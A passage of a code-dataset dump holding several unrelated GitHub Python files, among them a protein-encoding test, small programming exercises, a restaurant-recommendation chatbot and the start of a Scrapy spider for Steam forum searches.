0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\n ]\n ])\n \n # Define the expected Georgiev arrays\n expected_georgiev = np.empty([10, 3, 19])\n for i, combo in enumerate(tested_vars):\n for j, 
char in enumerate(combo):\n for k, param in enumerate(georgiev_parameters):\n expected_georgiev[i, j, k] = param[char]\n expected_georgiev[i + 5, j, k] = param[char]\n \n # Get the location of the fasta containing the test variants\n test_fasta = \"./Validation/pytest/Encode/TestData/DummyFastaEmbeddingTest.fasta\"\n \n # Define a dictionary for storing expected embedding results\n expected_results = {\"onehot\": expected_onehot,\n \"georgiev\": expected_georgiev}\n \n # Run tape for all models using the test variants\n for encoding in allowed_learned:\n \n # Get the save location\n save_loc = f\"./Validation/pytest/Encode/TestData/EncodingOutput/{encoding}.pkl\"\n \n # Run tape\n _ = subprocess.run([\"tape-embed\", test_fasta,\n encoding, \"--load-from\", tape_model_locations[encoding],\n \"--output\", save_loc])\n \n # Load results and store\n with open(save_loc, \"rb\") as f:\n tape_results = pickle.load(f)\n \n # Store results\n expected_learned = np.empty([len(tested_vars) * 2, 3, expected_shapes[encoding]])\n for i, result in enumerate(tape_results):\n for j, expected_mut_ind in enumerate(expected_mut_inds):\n expected_learned[i, j] = result[0, expected_mut_ind]\n expected_results[encoding] = expected_learned\n \n # Loop over possible library sizes\n for lib_ind, lib_size in enumerate(lib_sizes):\n \n # Generate a test library\n test_lib = list(product(all_aas, repeat=lib_size))\n \n # Get the back range of expected results\n if lib_size == 2:\n expected_results_range = np.arange(0, 5)\n else:\n expected_results_range = np.arange(5, 10)\n \n # Loop over all encodings\n for encoding in allowed_all:\n \n # Loop over batch sizes\n for batch_size in batch_sizes:\n \n # Make the encoder\n encoder = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = mutated_positions[:lib_size],\n n_positions_combined=lib_size)\n encoder.generate_encodings(n_batches=batch_size)\n time.sleep(1)\n \n # Load the index to combo and combo to index dictionaries\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_ComboToIndex.pkl\"), \"rb\") as f:\n combo_to_ind = pickle.load(f)\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_IndexToCombo.pkl\"), \"rb\") as f:\n ind_to_combo = pickle.load(f)\n \n # Make sure that the lengths fo combo to ind and ind to combo are accurate\n assert len(combo_to_ind) == expected_lengths[lib_ind]\n assert len(ind_to_combo) == expected_lengths[lib_ind]\n \n # Make sure the test library is the same as the actual library\n assert [test_combo == actual_combo for test_combo, actual_combo\n in zip(test_lib, encoder.all_combos)]\n assert len(test_lib) == len(encoder.all_combos)\n assert len(set(encoder.all_combos)) == len(encoder.all_combos)\n assert len(set(encoder.all_combos)) == expected_lengths[lib_ind]\n \n # Make sure that combo_to_ind and ind_to_combo are equivalent\n assert all(combo_to_ind[val] == key for key, val in ind_to_combo.items())\n \n # Load the unnormalized encodings \n unnorm_encodings = np.load(os.path.join(encoder.encoding_output, \n f\"{encoder.protein_name}_{encoder.encoding}_UnNormalized.npy\"))\n \n # Make sure that the shape of the encodings is what we expect\n assert (unnorm_encodings.shape == (expected_lengths[lib_ind], \n lib_size,\n expected_shapes[encoding]))\n \n # Find the indices for test combinations\n test_comb_inds = np.array([combo_to_ind[combo[:lib_size]]\n for combo in tested_vars])\n \n # Make sure 
that the expected and actual results are equivalent\n assert np.array_equal(unnorm_encodings[test_comb_inds], \n expected_results[encoding][expected_results_range, :lib_size])\n \n # Get the flat unnormalized encodings\n flat_unnorm = np.reshape(unnorm_encodings, \n [len(unnorm_encodings), \n np.product(unnorm_encodings.shape[1:])])\n \n # Make sure every row is unique\n assert len(flat_unnorm) == len(np.unique(flat_unnorm, axis = 0))\n \n # If this is a onehot encoding, make sure all rows add up to the \n # number of positions in library. Make sure all columns add up to\n # the number of combinations / 20. Afterward, continue\n if encoding == \"onehot\":\n \n # Add across all rows and columns\n row_sum = flat_unnorm.sum(axis = 1)\n col_sum = flat_unnorm.sum(axis = 0)\n \n # Make sure the shapes of rows and columns are correct\n assert len(row_sum.shape) == 1\n assert len(col_sum.shape) == 1\n assert len(row_sum) == expected_lengths[lib_ind]\n assert len(col_sum) == lib_size * 20\n \n # Make sure the colums and rows have the appropriate additions\n assert np.all(row_sum == lib_size)\n assert np.all(col_sum == expected_lengths[lib_ind] / 20)\n \n continue\n \n # Load the normalized encodings\n norm_encodings = np.load(os.path.join(encoder.encoding_output, \n f\"{encoder.protein_name}_{encoder.encoding}_Normalized.npy\"))\n \n # Make sure the shape is what we expect\n assert norm_encodings.shape == unnorm_encodings.shape\n \n # Make sure the array is different from the unnormalized encodings\n assert not np.array_equal(norm_encodings, unnorm_encodings)\n \n # Now make sure that we are unit-scaled, mean-centered\n flat_norm = np.reshape(norm_encodings, \n [len(norm_encodings), \n np.product(norm_encodings.shape[1:])])\n test_mean = flat_norm.mean(axis=0)\n test_stdev = flat_norm.std(axis = 0)\n \n # Make sure all rows are unique\n assert len(flat_norm) == len(np.unique(flat_norm, axis = 0))\n \n # Make sure our mean and standard deviation vectors are the \n # expected length\n assert len(test_mean) == expected_shapes[encoding] * lib_size\n assert len(test_stdev) == expected_shapes[encoding] * lib_size\n \n # Make sure the mean is roughly 0 and the standard deviation is \n # roughly 1\n assert np.all(np.abs(test_mean) < 1e-2)\n assert np.all(np.abs(np.ones(len(test_stdev)) - test_stdev) < 1e-4)\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)","repo_name":"navneedh/mlde_AL","sub_path":"Validation/pytest/Encode/test_EncodingGenerator.py","file_name":"test_EncodingGenerator.py","file_ext":"py","file_size_in_byte":32168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
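The tests in the record above keep rebuilding the full combinatorial library with itertools.product and comparing it against the pickled ComboToIndex/IndexToCombo dictionaries. A minimal sketch of that pairing, assuming a plain 20-letter amino-acid alphabet (the package's own all_aas tuple defines the real ordering):

from itertools import product

ALL_AAS = tuple("ACDEFGHIKLMNPQRSTVWY")  # assumed ordering; the real all_aas may differ

def build_combo_dicts(lib_size):
    # Every amino-acid combination over lib_size positions, in product() order.
    all_combos = ["".join(c) for c in product(ALL_AAS, repeat=lib_size)]
    combo_to_index = {combo: i for i, combo in enumerate(all_combos)}
    index_to_combo = {i: combo for i, combo in enumerate(all_combos)}
    return all_combos, combo_to_index, index_to_combo

combos, c2i, i2c = build_combo_dicts(2)
assert len(combos) == 20 ** 2 == 400
assert all(i2c[v] == k for k, v in c2i.items())  # the same invariant the tests assert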
+{"seq_id":"7358603423","text":"from queue import *\nfrom random import randint\nfrom time import *\nfrom threading import *\n\nclass Person:\n # ansi\n BLUE = \"\\033[0;34m\"\n GREEN = \"\\033[0;32m\"\n END = \"\\033[0m\"\n\n def __init__(self, ID):\n self.id = ID\n self.pages = randint(1, 25)\n self.print_time = self.pages / 10\n self.total_time = 0\n\n def status(self):\n print(self.GREEN + f\"person {self.id} | pages -> {self.pages} | print time -> {self.print_time} \"\n f\"| {round(self.total_time, 1)}\" + self.END)\n\n def finish(self):\n print(self.BLUE + f\"person {self.id} finished\" + self.END)\n\n\ndef enqueue():\n global x, total\n while True:\n p = Person(x)\n total += p.print_time\n p.total_time += total\n p.status()\n q.push(p)\n x += 1\n sleep(0.5)\n\n\ndef dequeue():\n global total\n while True:\n if not q.is_empty():\n p = q.peek()\n p.finish()\n sleep(p.print_time)\n q.pop()\n total -= p.print_time\n sleep(0.5)\n\n\n\n\n\n\nq = Queue()\nx = 1\ntotal = 0\n\nt1 = Thread(target=enqueue)\nt2 = Thread(target=dequeue)\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join()\n\n\n\n\n\n\n\n\n","repo_name":"ryanm36417/TCS_Projects","sub_path":"DataStructures/queue/printer queue simulation.py","file_name":"printer queue simulation.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74126658346","text":"class Model_Loader(object):\r\n __instance = None\r\n __first_init = True\r\n\r\n def __init__(self, ip):\r\n if self.__first_init:\r\n self.fuc()\r\n self.ip = ip\r\n self.__first_init = False\r\n\r\n def __new__(cls, *args, **kwargs):\r\n if not cls.__instance:\r\n cls.__instance = object.__new__(cls)\r\n return cls.__instance\r\n\r\n @staticmethod\r\n def fuc():\r\n print('fuc')\r\n\r\n\r\nobj1 = Model_Loader(1)\r\nobj2 = Model_Loader(2)\r\n# print(obj1.ip, obj2.ip)\r\n","repo_name":"wangs0007/AI_dialog_image_retrieval_bot","sub_path":"python_Singleton.py","file_name":"python_Singleton.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"5378101742","text":"from cs50 import get_int\n# Number must be positive integer and must be less than 8\n\nwhile True:\n h = get_int('height: ') # get height from user\n \n if (h >= 1) and (h <= 8): # height must be over 1 and below 8\n break\n \nfor i in range(h):\n print((h - 1 - i) * \" \", end=\"\")\n print((i + 1) * \"#\")\n","repo_name":"ccampbell949/CS50-Submissions","sub_path":"Python/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19837308981","text":"#!/usr/bin/python3\n''' Module with function to test matrix division '''\n\n\ndef matrix_divided(matrix, div):\n '''\n Function to divide all elements in matrix and return\n a new matrix with results\n '''\n\n if not isinstance(div, (int, float)):\n # print(\"we foung a wrong div\")\n raise TypeError(\"div must be a number\")\n elif div < 0:\n raise ZeroDivisionError(\"division by zero\")\n elif not len(set(map(len, matrix))) == 1:\n # print((set(map(len, matrix))))\n # print(\"we got an arrat here boys\")\n raise TypeError(\"Each row of the matrix must \"\n + \"have the same size\")\n for row in matrix:\n if not all(isinstance(num, (int, float)) for num in row):\n # print([num for num in row])\n raise TypeError(\"matrix must be a \"\n + \"matrix (list of lists) of integers/floats\")\n return [[round((num / div), 2) for num in row] for row in matrix]\n\n\ndef main():\n print(\"just to test :)\")\n matrix = [[0, 4], [3, 4.4, 4]]\n print(matrix_divided(matrix, 3))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PyBaker/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25201325000","text":"class Solution:\n def maxProfit(self, p: List[int]) -> int:\n if not p:\n return 0\n mp = 0\n minp = p[0]\n for i in range(1, len(p)):\n mp = max(mp, p[i] - minp)\n minp = min(p[i], minp)\n return mp\n \n ","repo_name":"Atul-Verma-Git/100-days-of-code","sub_path":"best-time-to-buy-and-sell-stock/best-time-to-buy-and-sell-stock.py","file_name":"best-time-to-buy-and-sell-stock.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22825261453","text":"import os\r\nimport re\r\nimport requests\r\nimport time\r\nimport random\r\nimport datetime\r\nimport copy\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom lxml import html\r\n\r\nfrom .dataset import GREETING_CORPUS, TYPE_CORPUS, PRICE_CHOICES, ANYPRICE_CORPUS, LOW_PRICE_CORPUS, MEDIUM_PRICE_CORPUS, HIGH_PRICE_CORPUS, PRICE_CORPUS, ANYTIME_CORPUS, SPECIFIC_TIME_CORPUS, TIME_CORPUS, RESET_CORPUS, ALL_CORPUS, GREETING_CHOICE, ACCEPTED_CHOICE, SAD_EMOJI_CHOICE, HAPPY_EMOJI_CHOICE, RECOMMAND_CHOICE, LABEL_COLORS, UNNECESSARY_WORDS, TYPE_CHOICES_HTML, CHOOSE_TIME_CORPUS, NOW_TIME_CORPUS, BREAKFAST_CORPUS, LUNCH_CORPUS, DINNER_CORPUS, STOP_WORDS\r\nfrom .dataset import df\r\n\r\nfrom . import query_df\r\n\r\nfrom .sentence_model import calculate_similarity_score\r\n\r\n\r\ndef generate_html_list(list):\r\n result = ''\r\n for element in list:\r\n result += f\"
' for type in chat.user.preferred_types])\r\n user_preferred_price_html = ' '.join([f'
{price}
' for price in chat.user.preferred_prices])\r\n \r\n chat.current_state = \"none\"\r\n \r\n answer = \"\"\r\n if not preferred_types:\r\n answer += '
' + random.choice(GREETING_CHOICE) + random.choice(HAPPY_EMOJI_CHOICE) + \"You didn't select preferred type of restaurants, You can setting in Edit Profile
\"\r\n if not preferred_prices:\r\n answer += '
' + random.choice(GREETING_CHOICE) + random.choice(HAPPY_EMOJI_CHOICE) + \"You didn't select preferred price of restaurants, You can setting in Edit Profile
\"\r\n if answer:\r\n chat.create_bot_message(\"text\", answer)\r\n\r\n if not preferred_types and not preferred_prices:\r\n answer = f\"{random.choice(HAPPY_EMOJI_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)} But don't worry We have some restaurant recommand to you !\"\r\n random_df = dataset.df.sample(n=5, replace=False)\r\n chat.create_bot_message(\"text\", answer)\r\n chat.create_bot_message_dataframe(random_df)\r\n return True\r\n \r\n type_df = pd.DataFrame([])\r\n for type in preferred_types:\r\n type_df = pd.concat([type_df, query_df.query_type(df, type)], ignore_index=True)\r\n \r\n price_df = pd.DataFrame([])\r\n for price_symbol in preferred_prices:\r\n if type_df.empty:\r\n price_df = pd.concat([price_df, query_df.query_price(df, price_symbol)], ignore_index=True)\r\n else:\r\n price_df = pd.concat([price_df, query_df.query_price(type_df, price_symbol)], ignore_index=True)\r\n\r\n selected_df = type_df if not preferred_prices else price_df\r\n if selected_df.empty:\r\n answer = f\"This is restaurant base on your setting prefers. If you don't like {random.choice(SAD_EMOJI_CHOICE)} you can change at Edit Profile
{random.choice(HAPPY_EMOJI_CHOICE)}
Types
{user_preferred_type_html}
Prices
{user_preferred_price_html}\"\r\n chat.create_bot_message(\"text\", answer)\r\n chat.create_bot_message_dataframe(type_df)\r\n return False\r\n \r\n final_df = query_df.query_in_period_now(selected_df)\r\n if final_df.empty:\r\n answer = f\"Not any restaurant are open right now. {random.choice(SAD_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n return False\r\n \r\n answer = f\"Here is a list of restaurants you must liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n chat.create_bot_message_dataframe(final_df)\r\n\r\n answer = f\"{random.choice(GREETING_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)} I just give you recommandation about restaurant {random.choice(HAPPY_EMOJI_CHOICE)} This data is based on your prefers. If you don't like {random.choice(SAD_EMOJI_CHOICE)} you can change at Edit Profile
Types
{user_preferred_type_html}
Prices
{user_preferred_price_html}\"\r\n chat.create_bot_message(\"text\", answer)\r\n answer = f\"We hope you liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n\r\n\r\ndef chat_answer(chat, input):\r\n copy_input = copy.copy(input)\r\n reset_answer = check_input_reset(chat, input)\r\n if reset_answer:\r\n return \r\n \r\n if \"recommand restaurant for me\" in input.lower():\r\n return answer_recommandation(chat)\r\n\r\n # CLEAR STOP WORDS\r\n for stopword in STOP_WORDS:\r\n input = input.replace(stopword, \"\")\r\n\r\n lst_input = input.lower().split()\r\n for word in lst_input:\r\n if word in UNNECESSARY_WORDS:\r\n continue\r\n predict, score = calculate_similarity_score(word, ALL_CORPUS)\r\n if predict in TYPE_CORPUS:\r\n chat.current_type = predict\r\n answer = answer_type(chat, predict)\r\n elif predict in TIME_CORPUS:\r\n chat.current_time = predict\r\n answer = answer_time(chat, predict)\r\n elif predict in PRICE_CORPUS:\r\n chat.current_price = predict\r\n answer = answer_price(chat, predict)\r\n\r\n \r\n if not chat.current_type and not chat.current_time and not chat.current_type:\r\n chat.save_current_df(df.copy())\r\n answer = answer_greeting(chat, input)\r\n\r\n if not chat.current_type:\r\n answer = answer_type(chat, input)\r\n if not answer:\r\n return question_type(chat, input)\r\n \r\n if not chat.current_price:\r\n answer = answer_price(chat, input)\r\n if not answer:\r\n return question_price(chat, input)\r\n\r\n if not chat.current_time:\r\n answer = answer_time(chat, input)\r\n if not answer:\r\n return question_time(chat, input)\r\n\r\n if chat.current_time.lower() in SPECIFIC_TIME_CORPUS:\r\n answer = answer_specific_time(chat, copy_input)\r\n if not answer:\r\n return question_specific_time(chat, input)\r\n \r\n return chat_final_answer_dataframe(chat)\r\n\r\n\r\ndef answer_greeting(chat, input):\r\n current_df = chat.get_current_df()\r\n\r\n predict, score = calculate_similarity_score(input, GREETING_CORPUS)\r\n print(\r\n f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}'\r\n )\r\n if predict in GREETING_CORPUS:\r\n question_type(chat, input)\r\n else:\r\n answer = (\r\n random.choice(GREETING_CHOICE)\r\n + random.choice(HAPPY_EMOJI_CHOICE)\r\n + \" Is there anything I can help you with?\"\r\n )\r\n chat.current_state = \"type\"\r\n chat.save()\r\n chat.save_current_df(current_df)\r\n return True\r\n\r\n# TYPE\r\ndef question_type(chat, input):\r\n\r\n question = f\"{random.choice(GREETING_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)} {random.choice(RECOMMAND_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n if chat.current_state == \"type\":\r\n question = f\"Based on my data You can try choosing a type of restaurant from this type.! {random.choice(HAPPY_EMOJI_CHOICE)} {TYPE_CHOICES_HTML}\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"type\"\r\n chat.save()\r\n\r\ndef answer_type(chat, input):\r\n predict, score = calculate_similarity_score(input.lower(), TYPE_CORPUS)\r\n print(f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}')\r\n if predict in TYPE_CORPUS:\r\n chat.current_type = predict\r\n chat.save()\r\n return True\r\n return False\r\n\r\n# PRICE\r\ndef question_price(chat, input):\r\n color = LABEL_COLORS[TYPE_CORPUS.index(chat.current_type) % len(LABEL_COLORS)]\r\n question = f\"
{chat.current_type}
What price range do you prefer?
Low (Less than 100 baht)
Medium (100 baht - 250 baht)
High (More than 250 baht)
Anyprice
\"\r\n if chat.current_state == \"price\":\r\n question = f\"Sorry {random.choice(SAD_EMOJI_CHOICE)} We were unable to find an answer for the message {input} with the data. You can try searching with our price information.
Low (Less than 100 Baht)
Medium (100 Baht - 250 Baht)
High (More than 250 Baht)
Any Price
\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"price\"\r\n chat.save()\r\n return question\r\n\r\ndef answer_price(chat, input):\r\n if input == \"1\":\r\n input = \"low\"\r\n if input == \"2\":\r\n input = \"medium\"\r\n if input == \"3\":\r\n input = \"high\"\r\n if input == \"4\":\r\n input = \"anyprice\"\r\n \r\n predict, score = calculate_similarity_score(input.lower(), PRICE_CORPUS)\r\n print(f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}')\r\n if predict in PRICE_CORPUS:\r\n chat.current_price = predict\r\n if predict in ANYPRICE_CORPUS:\r\n chat.current_state = \"completed\"\r\n chat.save()\r\n return True\r\n return False\r\n\r\n# TIME\r\ndef question_time(chat, input):\r\n color = [\"brown\", \"green\", \"red\"][PRICE_CORPUS.index(chat.current_price) % 3]\r\n question = f\"
{chat.current_price.title()}
What time do you want to go?
Now
Breakfast
Lunch
Dinner
Specific time
Anytime
\"\r\n if chat.current_state == \"time\":\r\n question = f\"
Choose time
Try to choose time you want to go again {random.choice(SAD_EMOJI_CHOICE)}
Now
Breakfast
Lunch
Dinner
Specific time
Anytime
\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"time\"\r\n chat.save()\r\n return question\r\n\r\ndef answer_time(chat, input):\r\n if input == \"1\":\r\n input = \"Now\"\r\n elif input == \"2\":\r\n input = \"Breakfast\"\r\n elif input == \"3\":\r\n input = \"Lunch\"\r\n elif input == \"4\":\r\n input = \"Dinner\"\r\n elif input == \"5\":\r\n input = \"Specific\"\r\n elif input == \"6\":\r\n input = \"Anytime\"\r\n\r\n predict, score = calculate_similarity_score(input.lower(), TIME_CORPUS)\r\n print(f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}')\r\n\r\n if predict in ANYTIME_CORPUS:\r\n answer = f\"Here is a list of restaurants you must liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n chat.current_state = \"completed\"\r\n chat.current_time = predict\r\n chat.save()\r\n return True\r\n elif predict in CHOOSE_TIME_CORPUS:\r\n chat.current_state = \"completed\"\r\n chat.current_time = predict\r\n if predict in NOW_TIME_CORPUS:\r\n chat.selected_time = datetime.datetime.now()\r\n elif predict in BREAKFAST_CORPUS:\r\n chat.selected_time = datetime.datetime.now().replace(hour=8)\r\n elif predict in LUNCH_CORPUS:\r\n chat.selected_time = datetime.datetime.now().replace(hour=12)\r\n elif predict in DINNER_CORPUS:\r\n chat.selected_time = datetime.datetime.now().replace(hour=16)\r\n chat.save()\r\n return True\r\n elif predict in SPECIFIC_TIME_CORPUS:\r\n return False\r\n return False\r\n\r\n# CHOOSE PERIOD\r\ndef question_specific_time(chat, input):\r\n chat.current_time = 'specific'\r\n question = f\"
Choose time
Please specify the time you want to go. (For example 18:30, 9.15, 10.00)\"\r\n if chat.current_state == \"choose_period\":\r\n question = f\"
{input}
Please specify the time according to the specified format. (For example 18:30, 9.15, 10.00)\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"choose_period\"\r\n chat.save()\r\n return question\r\n\r\ndef answer_specific_time(chat, input):\r\n try:\r\n select_time = datetime.datetime.strptime(input, \"%H.%M\")\r\n chat.selected_time = select_time\r\n except:\r\n try:\r\n select_time = datetime.datetime.strptime(input, \"%H:%M\")\r\n chat.selected_time = select_time\r\n except:\r\n chat.current_state = \"choose_period\"\r\n chat.save()\r\n return False\r\n\r\n chat.current_state = \"completed\"\r\n chat.save()\r\n return True\r\n\r\n# FINAL DATAFRAME\r\ndef chat_final_answer_dataframe(chat):\r\n chat.current_state = \"completed\"\r\n\r\n unqueried_df = dataset.df.copy()\r\n df = query_df.query_type(unqueried_df, chat.current_type)\r\n\r\n if chat.current_price not in ANYPRICE_CORPUS:\r\n df = query_df.query_price(df, chat.current_price)\r\n if df.empty:\r\n queried_type_df = query_df.query_type(unqueried_df, chat.current_type)\r\n answer = f\"Sorry {random.choice(SAD_EMOJI_CHOICE)} for the information right now. We couldn't find any
{chat.current_type}
for the
{chat.current_price.title()}
price. Here are
{chat.current_type}
that we recommend. We hope you like them. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_current_information()\r\n chat.create_bot_message_dataframe(queried_type_df)\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n \r\n if chat.selected_time:\r\n df = query_df.query_in_period_time(df, chat)\r\n if df.empty:\r\n selected_time = chat.selected_time.strftime(\"%H:%M\")\r\n queried_price_df = query_df.query_price(unqueried_df, chat.current_price)\r\n answer = f\"Sorry {random.choice(HAPPY_EMOJI_CHOICE)} We could not find any restaurants open during the time you selected.
{selected_time}
{chat.current_time.title()}
Here are our recommended restaurants. Hope you like it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_current_information()\r\n chat.create_bot_message_dataframe(queried_price_df)\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n \r\n answer = f\"Here is a list of restaurants you must liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_current_information()\r\n chat.create_bot_message_dataframe(df)\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n","repo_name":"alkaline1024/poodtam","sub_path":"chatbot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
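The chatbot above routes nearly every message through calculate_similarity_score(text, corpus), whose implementation lives in sentence_model and is not part of this listing. A minimal stand-in sketch using difflib, purely to illustrate the (predict, score) contract the callers rely on; the real model is presumably something richer:

from difflib import SequenceMatcher

def calculate_similarity_score(text, corpus):
    # Return the closest corpus entry and its similarity ratio in [0, 1].
    best, best_score = None, 0.0
    for candidate in corpus:
        score = SequenceMatcher(None, text.lower(), candidate.lower()).ratio()
        if score > best_score:
            best, best_score = candidate, score
    return best, best_score

print(calculate_similarity_score("dinnner", ["breakfast", "lunch", "dinner"]))
# ('dinner', 0.923...)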
+{"seq_id":"26118830359","text":"import scrapy\nimport re\n\n\ndef get_cookies_for_forum(forum_id: str) -> dict:\n cookies = {\"wants_mature_content_apps\": forum_id}\n return cookies\n\n\nclass SteamSpider(scrapy.Spider):\n \"\"\"Spider to scrape Steam forums.\n\n \"\"\"\n name = 'Steam'\n\n allowed_domains = [\"steamcommunity.com\"]\n start_urls = []\n custom_settings = {\n 'LOG_LEVEL': 'WARN',\n 'COOKIES_DEBUG': True,\n 'USER_AGENT': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 '\n 'Safari/537.1',\n 'ROBOTSTXT_OBEY': False,\n 'DOWNLOAD_DELAY': 1,\n # 'JOBDIR': './News/CNBCJobs',\n 'REQUEST_FINGERPRINTER_IMPLEMENTATION': '2.7',\n 'DOWNLOADER_MIDDLEWARES': {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'scrapy_user_agents.middlewares.RandomUserAgentMiddleware': 400,\n },\n 'RANDOM_UA_TYPE': \"random\",\n 'RETRY_ENABLED': True,\n 'RETRY_TIMES': 5,\n 'DUPEFILTER_CLASS': 'scrapy.dupefilters.BaseDupeFilter',\n 'FEEDS': {\"test.json\": {'format': 'json', \"encoding\": \"utf-8\"}}\n }\n\n def __init__(self, query: str = \"climate+change\", **kwargs):\n self.url_stream = f\"https://steamcommunity.com/discussions/forum/search/?q={query}&sort=time&p=\"\n super().__init__(**kwargs)\n\n def start_requests(self):\n yield scrapy.Request(self.url_stream + \"1&start=pages\", callback=self.request_all_pages)\n\n def request_all_pages(self, response):\n max_pages = int(response.css(\".discussion_search_pagingcontrols ::text\").getall()[-1].replace(\",\", \"\").\n split(\" \")[-2])\n for page in range(1, max_pages + 1):\n yield scrapy.Request(self.url_stream + str(page), callback=self.parse_page)\n\n def parse_page(self, response):\n body_urls = response.css(\".post_searchresult_simplereply ::attr(href)\").getall()\n for url in body_urls:\n id_ = re.search(\"/#c.*\", url)\n if id_:\n id_ = id_.group(0).replace(\"/#c\", \"\")\n else:\n id_ = \"op\"\n forum_id = re.search(\"app/.*\", url)\n if forum_id is None:\n forum_id = \"\"\n else:\n forum_id = forum_id.group(0).replace(\"app/\", \"\").split(\"/\")[0]\n url = re.split(\"#c.*\", url)[0]\n cookies = get_cookies_for_forum(forum_id)\n yield scrapy.Request(url, cookies=cookies, callback=self.find_comments_page,\n meta={\"id\": id_, \"base_url\": url, \"page\": 1, \"forum_id\": forum_id})\n\n def find_comments_page(self, response):\n url = response.url\n id_ = response.meta[\"id\"]\n base_url = response.meta[\"base_url\"]\n page = response.meta[\"page\"]\n forum_id = response.meta[\"forum_id\"]\n print(url, id_)\n cookies = get_cookies_for_forum(forum_id)\n if id_ == \"op\":\n yield scrapy.Request(base_url, cookies=cookies,\n callback=self.parse_post, meta={\"id\": id_})\n else:\n div_id = \"comment_\" + id_\n post = response.xpath(f'//div[@id=\"{div_id}\"]').get()\n new_page = page + 1\n if not post:\n yield scrapy.Request(f\"{base_url}?ctp={new_page}\", cookies=cookies,\n callback=self.find_comments_page,\n meta={\"id\": id_, \"base_url\": base_url, \"page\": new_page, \"forum_id\": forum_id})\n else:\n yield scrapy.Request(f\"{base_url}?ctp={page}&success=True\", cookies=cookies,\n callback=self.parse_post, meta={\"id\": id_})\n\n @staticmethod\n def parse_post(response):\n op = False\n meta = response.meta\n id_ = meta[\"id\"]\n if id_ == \"op\":\n op = True\n if op:\n post = response.css(\".forum_op\")\n else:\n id_ = \"comment_\" + id_\n post = response.xpath(f'//div[@id=\"{id_}\"]')\n if op:\n author = post.css(\".forum_op_author ::text\").getall()[-1]\n author_url = 
